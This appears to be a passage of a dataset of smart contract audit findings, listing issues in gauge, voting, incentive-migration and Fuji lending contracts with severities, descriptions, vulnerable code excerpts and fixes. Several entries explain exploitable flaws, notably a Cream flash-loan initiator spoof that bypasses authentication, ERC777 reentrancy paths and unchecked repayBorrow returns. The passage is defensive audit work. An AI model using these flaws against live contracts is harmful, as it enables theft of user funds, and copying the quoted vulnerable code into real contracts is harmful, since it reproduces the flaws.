keccak256(abi.encode(DELEGATION\\_TYPEHASH, delegatee, nonce, expiry))\\n )\\n ),\\n v,\\n r,\\n s\\n );\\n require(nonce == nonces[signer]++, ""ERC20MultiVotes: invalid nonce"");\\n \\_delegate(signer, delegatee);\\n}\\n```\\n" +Decreasing maxGauges does not account for users' previous gauge list size.,low,"`ERC20Gauges` contract has a `maxGauges` state variable meant to represent the maximum amount of gauges a user can allocate to. As per the natspec, it is meant to protect against gas DOS attacks upon token transfer to allow complicated transactions to fit in a block. There is also a function `setMaxGauges` for authorised users to decrease or increase this state variable.\\n```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n\\nHowever, if it is decreased and there are users that have already reached the previous maximum that was larger, there may be unexpected behavior. All of these users' gauges will remain active and manageable, such as have user gauge weights incremented or decremented. So it could be possible that for such a user address `user_address`, numUserGauges(user_address) > `maxGauges`. While in the current contract logic this does not cause issues, `maxGauges` is a public variable that may be used by other systems. If unaccounted for, this discrepancy between the contract's `maxGauges` and the users' actual number of gauges given by `numUserGauges()` could, for example, cause gauges to be skipped or fail loops bounded by `maxGauges` in other systems' logic that try and go through all user gauges.","Either document the potential discrepancy between the user gauges size and the `maxGauges` state variable, or limit `maxGauges` to be only called within the contract thereby forcing other contracts to retrieve user gauge list size through `numUserGauges()`.",,"```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n" +Decrementing a gauge by 0 that is not in the user gauge list will fail an assert.,low,"`ERC20Gauges._decrementGaugeWeight` has an edge case scenario where a user can attempt to decrement a `gauge` that is not in the user `gauge` list by 0 `weight`, which would trigger a failure in an assert.\\n```\\nfunction \\_decrementGaugeWeight(\\n address user,\\n address gauge,\\n uint112 weight,\\n uint32 cycle\\n) internal {\\n uint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\n getUserGaugeWeight[user][gauge] = oldWeight - weight;\\n if (oldWeight == weight) {\\n // If removing all weight, remove gauge from user list.\\n assert(\\_userGauges[user].remove(gauge));\\n }\\n```\\n\\nAs `_decrementGaugeWeight`, `decrementGauge`, or `decrementGauges` don't explicitly check that a `gauge` belongs to the user, the contract logic continues with its operations in `_decrementGaugeWeight` for any gauges passed to it. In general this is fine because if a user tries to decrement non-zero `weight` from a `gauge` they have no allocation to, thus getting `getUserGaugeWeight[user][gauge]=0`, there would be a revert due to a negative value being passed to `getUserGaugeWeight[user][gauge]`\\n```\\nuint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\ngetUserGaugeWeight[user][gauge] = oldWeight - weight;\\n```\\n\\nHowever, passing a `weight=0` parameter with a `gauge` that doesn't belong to the user, would successfully process that line. This would then be followed by an evaluation `if (oldWeight == weight)`, which would also succeed since both are 0, to finally reach an assert that will verify a remove of that `gauge` from the user `gauge` list. However, it will fail since it was never there in the first place.\\n```\\nassert(\\_userGauges[user].remove(gauge));\\n```\\n\\nAlthough an edge case with no effect on contract state's health, it may happen with front end bugs or incorrect user transactions, and it is best not to have asserts fail.",Replace `assert()` with a `require()` or verify that the gauge belongs to the user prior to performing any operations.,,"```\\nfunction \\_decrementGaugeWeight(\\n address user,\\n address gauge,\\n uint112 weight,\\n uint32 cycle\\n) internal {\\n uint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\n getUserGaugeWeight[user][gauge] = oldWeight - weight;\\n if (oldWeight == weight) {\\n // If removing all weight, remove gauge from user list.\\n assert(\\_userGauges[user].remove(gauge));\\n }\\n```\\n" +Undelegating 0 votes from an address who is not a delegate of a user will fail an assert.,low,"Similar scenario with issue 5.5. `ERC20MultiVotes._undelegate` has an edge case scenario where a user can attempt to undelegate from a `delegatee` that is not in the user delegates list by 0 `amount`, which would trigger a failure in an assert.\\n```\\nfunction \\_undelegate(\\n address delegator,\\n address delegatee,\\n uint256 amount\\n) internal virtual {\\n uint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n\\n if (newDelegates == 0) {\\n assert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n }\\n```\\n\\nAs `_undelegate`, or `undelegate` don't explicitly check that a `delegatee` belongs to the user, the contract logic continues with its operations in `_undelegate` for the `delegatee` passed to it. In general this is fine because if a user tries to `undelegate` non-zero `amount` from a `delegatee` they have no votes delegated to, thus getting `_delegatesVotesCount[delegator][delegatee]=0`, there would be a revert due to a negative value being passed to `uint256 newDelegates`\\n```\\nuint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n```\\n\\nHowever, passing a `amount=0` parameter with a `delegatee` that doesn't belong to the user, would successfully process that line. This would then be followed by an evaluation `if (newDelegates == 0)`, which would succeed, to finally reach an assert that will verify a remove of that `delegatee` from the user delegates list. However, it will fail since it was never there in the first place.\\n```\\nassert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n```\\n\\nAlthough an edge case with no effect on contract state's health, it may happen with front end bugs or incorrect user transactions, and it is best not to have asserts fail, as per the dev comment in that line “// Should never fail”.",Replace `assert()` with a `require()` or verify that the delegatee belongs to the user prior to performing any operations.,,"```\\nfunction \\_undelegate(\\n address delegator,\\n address delegatee,\\n uint256 amount\\n) internal virtual {\\n uint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n\\n if (newDelegates == 0) {\\n assert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n }\\n```\\n" +xTRIBE.emitVotingBalances - DelegateVotesChanged event can be emitted by anyone,medium,"`xTRIBE.emitVotingBalances` is an external function without authentication constraints. It means anyone can call it and emit `DelegateVotesChanged` which may impact other layers of code that rely on these events.\\n```\\nfunction emitVotingBalances(address[] calldata accounts) external {\\n uint256 size = accounts.length;\\n\\n for (uint256 i = 0; i < size; ) {\\n emit DelegateVotesChanged(accounts[i], 0, getVotes(accounts[i]));\\n\\n unchecked {\\n i++;\\n }\\n }\\n}\\n```\\n",Consider restricting access to this function for allowed accounts only.,,"```\\nfunction emitVotingBalances(address[] calldata accounts) external {\\n uint256 size = accounts.length;\\n\\n for (uint256 i = 0; i < size; ) {\\n emit DelegateVotesChanged(accounts[i], 0, getVotes(accounts[i]));\\n\\n unchecked {\\n i++;\\n }\\n }\\n}\\n```\\n" +Decreasing maxGauges does not account for users' previous gauge list size.,low,"`ERC20Gauges` contract has a `maxGauges` state variable meant to represent the maximum amount of gauges a user can allocate to. As per the natspec, it is meant to protect against gas DOS attacks upon token transfer to allow complicated transactions to fit in a block. There is also a function `setMaxGauges` for authorised users to decrease or increase this state variable.\\n```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n\\nHowever, if it is decreased and there are users that have already reached the previous maximum that was larger, there may be unexpected behavior. All of these users' gauges will remain active and manageable, such as have user gauge weights incremented or decremented. So it could be possible that for such a user address `user_address`, numUserGauges(user_address) > `maxGauges`. While in the current contract logic this does not cause issues, `maxGauges` is a public variable that may be used by other systems. If unaccounted for, this discrepancy between the contract's `maxGauges` and the users' actual number of gauges given by `numUserGauges()` could, for example, cause gauges to be skipped or fail loops bounded by `maxGauges` in other systems' logic that try and go through all user gauges.","Either document the potential discrepancy between the user gauges size and the `maxGauges` state variable, or limit `maxGauges` to be only called within the contract thereby forcing other contracts to retrieve user gauge list size through `numUserGauges()`.",,"```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n" +Accounts that claim incentives immediately before the migration will be stuck,medium,"For accounts that existed before the migration to the new incentive calculation, the following happens when they claim incentives for the first time after the migration: First, the incentives that are still owed from before the migration are computed according to the old formula; the incentives since the migration are calculated according to the new logic, and the two values are added together. The first part - calculating the pre-migration incentives according to the old formula - happens in function MigrateIncentives.migrateAccountFromPreviousCalculation; the following lines are of particular interest in the current context:\\n```\\nuint256 timeSinceMigration = finalMigrationTime - lastClaimTime;\\n\\n// (timeSinceMigration \\* INTERNAL\\_TOKEN\\_PRECISION \\* finalEmissionRatePerYear) / YEAR\\nuint256 incentiveRate =\\n timeSinceMigration\\n .mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n // Migration emission rate is stored as is, denominated in whole tokens\\n .mul(finalEmissionRatePerYear).mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n .div(Constants.YEAR);\\n\\n// Returns the average supply using the integral of the total supply.\\nuint256 avgTotalSupply = finalTotalIntegralSupply.sub(lastClaimIntegralSupply).div(timeSinceMigration);\\n```\\n\\nThe division in the last line will throw if `finalMigrationTime` and `lastClaimTime` are equal. This will happen if an account claims incentives immediately before the migration happens - where “immediately” means in the same block. In such a case, the account will be stuck as any attempt to claim incentives will revert.","The function should return `0` if `finalMigrationTime` and `lastClaimTime` are equal. Moreover, the variable name `timeSinceMigration` is misleading, as the variable doesn't store the time since the migration but the time between the last incentive claim and the migration.",,"```\\nuint256 timeSinceMigration = finalMigrationTime - lastClaimTime;\\n\\n// (timeSinceMigration \\* INTERNAL\\_TOKEN\\_PRECISION \\* finalEmissionRatePerYear) / YEAR\\nuint256 incentiveRate =\\n timeSinceMigration\\n .mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n // Migration emission rate is stored as is, denominated in whole tokens\\n .mul(finalEmissionRatePerYear).mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n .div(Constants.YEAR);\\n\\n// Returns the average supply using the integral of the total supply.\\nuint256 avgTotalSupply = finalTotalIntegralSupply.sub(lastClaimIntegralSupply).div(timeSinceMigration);\\n```\\n" +type(T).max is inclusive,low,"Throughout the codebase, there are checks whether a number can be represented by a certain type.\\n```\\nrequire(accumulatedNOTEPerNToken < type(uint128).max); // dev: accumulated NOTE overflow\\n```\\n\\n```\\nrequire(blockTime < type(uint32).max); // dev: block time overflow\\n```\\n\\n```\\nrequire(totalSupply <= type(uint96).max);\\nrequire(blockTime <= type(uint32).max);\\n```\\n\\nSometimes these checks use `<=`, sometimes they use `<`.","`type(T).max` is inclusive, i.e., it is the greatest number that can be represented with type `T`. Strictly speaking, it can and should therefore be used consistently with `<=` instead of `<`.",,```\\nrequire(accumulatedNOTEPerNToken < type(uint128).max); // dev: accumulated NOTE overflow\\n```\\n +FlasherFTM - Unsolicited invocation of the callback (CREAM auth bypass),high,"TL;DR: Anyone can call `ICTokenFlashloan(crToken).flashLoan(address(FlasherFTM), address(FlasherFTM), info.amount, params)` directly and pass validation checks in `onFlashLoan()`. This call forces it to accept unsolicited flash loans and execute the actions provided under the attacker's `FlashLoan.Info`.\\n`receiver.onFlashLoan(initiator, token, amount, ...)` is called when receiving a flash loan. According to EIP-3156, the `initiator` is `msg.sender` so that one can use it to check if the call to `receiver.onFlashLoan()` was unsolicited or not.\\nThird-party Flash Loan provider contracts are often upgradeable.\\nFor example, the Geist lending contract configured with this system is upgradeable. Upgradeable contracts bear the risk that one cannot assume that the contract is always running the same code. In the worst case, for example, a malicious proxy admin (leaked keys, insider, …) could upgrade the contract and perform unsolicited calls with arbitrary data to Flash Loan consumers in an attempt to exploit them. It, therefore, is highly recommended to verify that flash loan callbacks in the system can only be called if the contract was calling out to the provider to provide a Flash Loan and that the conditions of the flash loan (returned data, amount) are correct.\\nNot all Flash Loan providers implement EIP-3156 correctly.\\nCream Finance, for example, allows users to set an arbitrary `initiator` when requesting a flash loan. This deviates from EIP-3156 and was reported to the Cream development team as a security issue. Hence, anyone can spoof that `initiator` and potentially bypass authentication checks in the consumers' `receiver.onFlashLoan()`. Depending on the third-party application consuming the flash loan is doing with the funds, the impact might range from medium to critical with funds at risk. For example, projects might assume that the flash loan always originates from their trusted components, e.g., because they use them to refinance switching funds between pools or protocols.\\nThe `FlasherFTM` contract assumes that flash loans for the Flasher can only be initiated by authorized callers (isAuthorized) - for a reason - because it is vital that the `FlashLoan.Info calldata info` parameter only contains trusted data:\\n```\\n/\\*\\*\\n \\* @dev Routing Function for Flashloan Provider\\n \\* @param info: struct information for flashLoan\\n \\* @param \\_flashnum: integer identifier of flashloan provider\\n \\*/\\nfunction initiateFlashloan(FlashLoan.Info calldata info, uint8 \\_flashnum) external isAuthorized override {\\n if (\\_flashnum == 0) {\\n \\_initiateGeistFlashLoan(info);\\n } else if (\\_flashnum == 2) {\\n \\_initiateCreamFlashLoan(info);\\n } else {\\n revert(Errors.VL\\_INVALID\\_FLASH\\_NUMBER);\\n }\\n}\\n```\\n\\n```\\nmodifier isAuthorized() {\\n require(\\n msg.sender == \\_fujiAdmin.getController() ||\\n msg.sender == \\_fujiAdmin.getFliquidator() ||\\n msg.sender == owner(),\\n Errors.VL\\_NOT\\_AUTHORIZED\\n );\\n \\_;\\n}\\n```\\n\\nThe Cream Flash Loan initiation code requests the flash loan via ICTokenFlashloan(crToken).flashLoan(receiver=address(this), initiator=address(this), ...):\\n```\\n/\\*\\*\\n \\* @dev Initiates an CreamFinance flashloan.\\n \\* @param info: data to be passed between functions executing flashloan logic\\n \\*/\\nfunction \\_initiateCreamFlashLoan(FlashLoan.Info calldata info) internal {\\n address crToken = info.asset == \\_FTM\\n ? 0xd528697008aC67A21818751A5e3c58C8daE54696\\n : \\_crMappings.addressMapping(info.asset);\\n\\n // Prepara data for flashloan execution\\n bytes memory params = abi.encode(info);\\n\\n // Initialize Instance of Cream crLendingContract\\n ICTokenFlashloan(crToken).flashLoan(address(this), address(this), info.amount, params);\\n}\\n```\\n\\nNote: The Cream implementation does not send `sender=msg.sender` to the `onFlashLoan()` callback - like any other flash loan provider does and EIP-3156 suggests - but uses the value that was passed in as `initiator` when requesting the callback. This detail completely undermines the authentication checks implemented in `onFlashLoan` as the `sender` value cannot be trusted.\\n```\\naddress initiator,\\n```\\n\\n```\\n \\*/\\nfunction onFlashLoan(\\n address sender,\\n address underlying,\\n uint256 amount,\\n uint256 fee,\\n bytes calldata params\\n) external override returns (bytes32) {\\n // Check Msg. Sender is crToken Lending Contract\\n // from IronBank because ETH on Cream cannot perform a flashloan\\n address crToken = underlying == \\_WFTM\\n ? 0xd528697008aC67A21818751A5e3c58C8daE54696\\n : \\_crMappings.addressMapping(underlying);\\n require(msg.sender == crToken && address(this) == sender, Errors.VL\\_NOT\\_AUTHORIZED);\\n```\\n","Cream Finance\\nWe've reached out to the Cream developer team, who have confirmed the issue. They are planning to implement countermeasures. Our recommendation can be summarized as follows:\\nImplement the EIP-3156 compliant version of flashLoan() with initiator hardcoded to `msg.sender`.\\nFujiDAO (and other flash loan consumers)\\nWe recommend not assuming that `FlashLoan.Info` contains trusted or even validated data when a third-party flash loan provider provides it! Developers should ensure that the data received was provided when the flash loan was requested.\\nThe contract should reject unsolicited flash loans. In the scenario where a flash loan provider is exploited, the risk of an exploited trust relationship is less likely to spread to the rest of the system.\\nThe Cream `initiator` provided to the `onFlashLoan()` callback cannot be trusted until the Cream developers fix this issue. The `initiator` can easily be spoofed to perform unsolicited flash loans. We, therefore, suggest:\\nValidate that the `initiator` value is the `flashLoan()` caller. This conforms to the standard and is hopefully how the Cream team is fixing this, and\\nEnsure the implementation tracks its own calls to `flashLoan()` in a state-variable semaphore, i.e. store the flash loan data/hash in a temporary state-variable that is only set just before calling `flashLoan()` until being called back in `onFlashLoan()`. The received data can then be verified against the stored artifact. This is a safe way of authenticating and verifying callbacks.\\nValues received from untrusted third parties should always be validated with the utmost scrutiny.\\nSmart contract upgrades are risky, so we recommend implementing the means to pause certain flash loan providers.\\nEnsure that flash loan handler functions should never re-enter the system. This provides additional security guarantees in case a flash loan provider gets breached.\\nNote: The Fuji development team implemented a hotfix to prevent unsolicited calls from Cream by storing the `hash(FlashLoan.info)` in a state variable just before requesting the flash loan. Inside the `onFlashLoan` callback, this state is validated and cleared accordingly.\\nAn improvement to this hotfix would be, to check `_paramsHash` before any external calls are made and clear it right after validation at the beginning of the function. Additionally, `hash==0x0` should be explicitly disallowed. By doing so, the check also serves as a reentrancy guard and helps further reduce the risk of a potentially malicious flash loan re-entering the function.",,"```\\n/\\*\\*\\n \\* @dev Routing Function for Flashloan Provider\\n \\* @param info: struct information for flashLoan\\n \\* @param \\_flashnum: integer identifier of flashloan provider\\n \\*/\\nfunction initiateFlashloan(FlashLoan.Info calldata info, uint8 \\_flashnum) external isAuthorized override {\\n if (\\_flashnum == 0) {\\n \\_initiateGeistFlashLoan(info);\\n } else if (\\_flashnum == 2) {\\n \\_initiateCreamFlashLoan(info);\\n } else {\\n revert(Errors.VL\\_INVALID\\_FLASH\\_NUMBER);\\n }\\n}\\n```\\n" +Lack of reentrancy protection in token interactions,high,"Token operations may potentially re-enter the system. For example, `univTransfer` may perform a low-level `to.call{value}()` and, depending on the token's specification (e.g. `ERC-20` extension or `ERC-20` compliant ERC-777), `token` may implement callbacks when being called as `token.safeTransfer(to, amount)` (or token.transfer*()).\\nTherefore, it is crucial to strictly adhere to the checks-effects pattern and safeguard affected methods using a mutex.\\n```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isFTM(token)) {\\n (bool sent, ) = to.call{ value: amount }("""");\\n require(sent, ""Failed to send Ether"");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n\\n`withdraw` is `nonReentrant` while `paybackAndWithdraw` is not, which appears to be inconsistent\\n```\\n/\\*\\*\\n \\* @dev Paybacks the underlying asset and withdraws collateral in a single function call from activeProvider\\n \\* @param \\_paybackAmount: amount of underlying asset to be payback, pass -1 to pay full amount\\n \\* @param \\_collateralAmount: amount of collateral to be withdrawn, pass -1 to withdraw maximum amount\\n \\*/\\nfunction paybackAndWithdraw(int256 \\_paybackAmount, int256 \\_collateralAmount) external payable {\\n updateF1155Balances();\\n \\_internalPayback(\\_paybackAmount);\\n \\_internalWithdraw(\\_collateralAmount);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* @dev Paybacks Vault's type underlying to activeProvider - called by users\\n \\* @param \\_repayAmount: token amount of underlying to repay, or\\n \\* pass any 'negative number' to repay full ammount\\n \\* Emits a {Repay} event.\\n \\*/\\nfunction payback(int256 \\_repayAmount) public payable override {\\n updateF1155Balances();\\n \\_internalPayback(\\_repayAmount);\\n}\\n```\\n\\n`depositAndBorrow` is not `nonReentrant` while `borrow()` is which appears to be inconsistent\\n```\\n/\\*\\*\\n \\* @dev Deposits collateral and borrows underlying in a single function call from activeProvider\\n \\* @param \\_collateralAmount: amount to be deposited\\n \\* @param \\_borrowAmount: amount to be borrowed\\n \\*/\\nfunction depositAndBorrow(uint256 \\_collateralAmount, uint256 \\_borrowAmount) external payable {\\n updateF1155Balances();\\n \\_internalDeposit(\\_collateralAmount);\\n \\_internalBorrow(\\_borrowAmount);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* @dev Borrows Vault's type underlying amount from activeProvider\\n \\* @param \\_borrowAmount: token amount of underlying to borrow\\n \\* Emits a {Borrow} event.\\n \\*/\\nfunction borrow(uint256 \\_borrowAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalBorrow(\\_borrowAmount);\\n}\\n```\\n\\nHere's an example call stack for `depositAndBorrow` that outlines how a reentrant `ERC20` token (e.g. ERC777) may call back into `depositAndBorrow` again, `updateBalances` twice in the beginning before tokens are even transferred and then continues to call `internalDeposit`, `internalBorrow`, `internalBorrow` without an update before the 2nd borrow. Note that both `internalDeposit` and `internalBorrow` read indexes that may now be outdated.\\n```\\ndepositAndBorrow\\n updateBalances\\n internalDeposit ->\\n ERC777(collateralAsset).safeTransferFrom() ---> calls back!\\n ---callback:beforeTokenTransfer---->\\n !! depositAndBorrow\\n updateBalances\\n internalDeposit\\n --> ERC777.safeTransferFrom()\\n <--\\n \\_deposit\\n mint\\n internalBorrow\\n mint\\n \\_borrow\\n ERC777(borrowAsset).univTransfer(msg.sender) --> might call back\\n\\n <-------------------------------\\n \\_deposit\\n mint\\n internalBorrow\\n mint\\n \\_borrow \\n --> ERC777(borrowAsset).univTransfer(msg.sender) --> might call back\\n <--\\n```\\n","Consider decorating methods that may call back to untrusted sources (i.e., native token transfers, callback token operations) as `nonReentrant` and strictly follow the checks-effects pattern for all contracts in the code-base.",,"```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isFTM(token)) {\\n (bool sent, ) = to.call{ value: amount }("""");\\n require(sent, ""Failed to send Ether"");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n" +Unchecked Return Values - ICErc20 repayBorrow,high,"`ICErc20.repayBorrow` returns a non-zero uint on error. Multiple providers do not check for this error condition and might return `success` even though `repayBorrow` failed, returning an error code.\\nThis can potentially allow a malicious user to call `paybackAndWithdraw()` while not repaying by causing an error in the sub-call to `Compound.repayBorrow()`, which ends up being silently ignored. Due to the missing success condition check, execution continues normally with `_internalWithdraw()`.\\nAlso, see issue 4.5.\\n```\\nfunction repayBorrow(uint256 repayAmount) external returns (uint256);\\n```\\n\\nThe method may return an error due to multiple reasons:\\n```\\nfunction repayBorrowInternal(uint repayAmount) internal nonReentrant returns (uint, uint) {\\n uint error = accrueInterest();\\n if (error != uint(Error.NO\\_ERROR)) {\\n // accrueInterest emits logs on errors, but we still want to log the fact that an attempted borrow failed\\n return (fail(Error(error), FailureInfo.REPAY\\_BORROW\\_ACCRUE\\_INTEREST\\_FAILED), 0);\\n }\\n // repayBorrowFresh emits repay-borrow-specific logs on errors, so we don't need to\\n return repayBorrowFresh(msg.sender, msg.sender, repayAmount);\\n}\\n```\\n\\n```\\nif (allowed != 0) {\\n return (failOpaque(Error.COMPTROLLER\\_REJECTION, FailureInfo.REPAY\\_BORROW\\_COMPTROLLER\\_REJECTION, allowed), 0);\\n}\\n\\n/\\* Verify market's block number equals current block number \\*/\\nif (accrualBlockNumber != getBlockNumber()) {\\n return (fail(Error.MARKET\\_NOT\\_FRESH, FailureInfo.REPAY\\_BORROW\\_FRESHNESS\\_CHECK), 0);\\n}\\n\\nRepayBorrowLocalVars memory vars;\\n\\n/\\* We remember the original borrowerIndex for verification purposes \\*/\\nvars.borrowerIndex = accountBorrows[borrower].interestIndex;\\n\\n/\\* We fetch the amount the borrower owes, with accumulated interest \\*/\\n(vars.mathErr, vars.accountBorrows) = borrowBalanceStoredInternal(borrower);\\nif (vars.mathErr != MathError.NO\\_ERROR) {\\n return (failOpaque(Error.MATH\\_ERROR, FailureInfo.REPAY\\_BORROW\\_ACCUMULATED\\_BALANCE\\_CALCULATION\\_FAILED, uint(vars.mathErr)), 0);\\n}\\n```\\n\\nMultiple providers, here are some examples:\\n```\\n // Check there is enough balance to pay\\n require(erc20token.balanceOf(address(this)) >= \\_amount, ""Not-enough-token"");\\n erc20token.univApprove(address(cyTokenAddr), \\_amount);\\n cyToken.repayBorrow(\\_amount);\\n}\\n```\\n\\n```\\nrequire(erc20token.balanceOf(address(this)) >= \\_amount, ""Not-enough-token"");\\nerc20token.univApprove(address(cyTokenAddr), \\_amount);\\ncyToken.repayBorrow(\\_amount);\\n```\\n\\n```\\nif (\\_isETH(\\_asset)) {\\n // Create a reference to the corresponding cToken contract\\n ICEth cToken = ICEth(cTokenAddr);\\n\\n cToken.repayBorrow{ value: msg.value }();\\n} else {\\n // Create reference to the ERC20 contract\\n IERC20 erc20token = IERC20(\\_asset);\\n\\n // Create a reference to the corresponding cToken contract\\n ICErc20 cToken = ICErc20(cTokenAddr);\\n\\n // Check there is enough balance to pay\\n require(erc20token.balanceOf(address(this)) >= \\_amount, ""Not-enough-token"");\\n erc20token.univApprove(address(cTokenAddr), \\_amount);\\n cToken.repayBorrow(\\_amount);\\n}\\n```\\n",Check for `cyToken.repayBorrow(_amount) != 0` or `Error.NO_ERROR`.,,```\\nfunction repayBorrow(uint256 repayAmount) external returns (uint256);\\n```\\n +"Unchecked Return Values - IComptroller exitMarket, enterMarket",high,"`IComptroller.exitMarket()`, `IComptroller.enterMarkets()` may return a non-zero uint on error but none of the Providers check for this error condition. Together with issue 4.10, this might suggest that unchecked return values may be a systemic problem.\\nHere's the upstream implementation:\\n```\\nif (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n}\\n\\n/\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\nuint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\nif (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n}\\n```\\n\\n```\\n /\\*\\*\\n \\* @notice Removes asset from sender's account liquidity calculation\\n \\* @dev Sender must not have an outstanding borrow balance in the asset,\\n \\* or be providing necessary collateral for an outstanding borrow.\\n \\* @param cTokenAddress The address of the asset to be removed\\n \\* @return Whether or not the account successfully exited the market\\n \\*/\\n function exitMarket(address cTokenAddress) external returns (uint) {\\n CToken cToken = CToken(cTokenAddress);\\n /\\* Get sender tokensHeld and amountOwed underlying from the cToken \\*/\\n (uint oErr, uint tokensHeld, uint amountOwed, ) = cToken.getAccountSnapshot(msg.sender);\\n require(oErr == 0, ""exitMarket: getAccountSnapshot failed""); // semi-opaque error code\\n\\n /\\* Fail if the sender has a borrow balance \\*/\\n if (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n }\\n\\n /\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\n uint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\n if (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n }\\n```\\n\\nUnchecked return value `exitMarket`\\nAll Providers exhibit the same issue, probably due to code reuse. (also see https://github.com/ConsenSysDiligence/fuji-protocol-audit-2022-02/issues/19). Some examples:\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\nUnchecked return value `enterMarkets` (Note that `IComptroller` returns `NO_ERROR` when already joined to `enterMarkets`.\\nAll Providers exhibit the same issue, probably due to code reuse. (also see https://github.com/ConsenSysDiligence/fuji-protocol-audit-2022-02/issues/19). For example:\\n```\\nfunction \\_enterCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n address[] memory cyTokenMarkets = new address[](1);\\n cyTokenMarkets[0] = \\_cyTokenAddress;\\n comptroller.enterMarkets(cyTokenMarkets);\\n}\\n```\\n",Require that return value is `ERROR.NO_ERROR` or `0`.,,"```\\nif (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n}\\n\\n/\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\nuint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\nif (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n}\\n```\\n" +Fliquidator - excess funds of native tokens are not returned,medium,"`FliquidatorFTM.batchLiquidate` accepts the `FTM` native token and checks if at least an amount of `debtTotal` was provided with the call. The function continues using the `debtTotal` value. If a caller provides msg.value > `debtTotal`, excess funds are not returned and remain in the contract. `FliquidatorFTM` is not upgradeable, and there is no way to recover the surplus funds.\\n```\\nif (vAssets.borrowAsset == FTM) {\\n require(msg.value >= debtTotal, Errors.VL\\_AMOUNT\\_ERROR);\\n} else {\\n```\\n",Consider returning excess funds. Consider making `_constructParams` public to allow the caller to pre-calculate the `debtTotal` that needs to be provided with the call.\\nConsider removing support for native token `FTM` entirely to reduce the overall code complexity. The wrapped equivalent can be used instead.,,"```\\nif (vAssets.borrowAsset == FTM) {\\n require(msg.value >= debtTotal, Errors.VL\\_AMOUNT\\_ERROR);\\n} else {\\n```\\n" +Unsafe arithmetic casts,medium,"The reason for using signed integers in some situations appears to be to use negative values as an indicator to withdraw everything. Using a whole bit of uint256 for this is quite a lot when using `type(uint256).max` would equal or better serve as a flag to withdraw everything.\\nFurthermore, even though the code uses `solidity 0.8.x`, which safeguards arithmetic operations against under/overflows, arithmetic typecast is not protected.\\nAlso, see issue 4.9 for a related issue.\\n```\\n⇒ solidity-shell\\n\\n🚀 Entering interactive Solidity ^0.8.11 shell. '.help' and '.exit' are your friends.\\n » ℹ️ ganache-mgr: starting 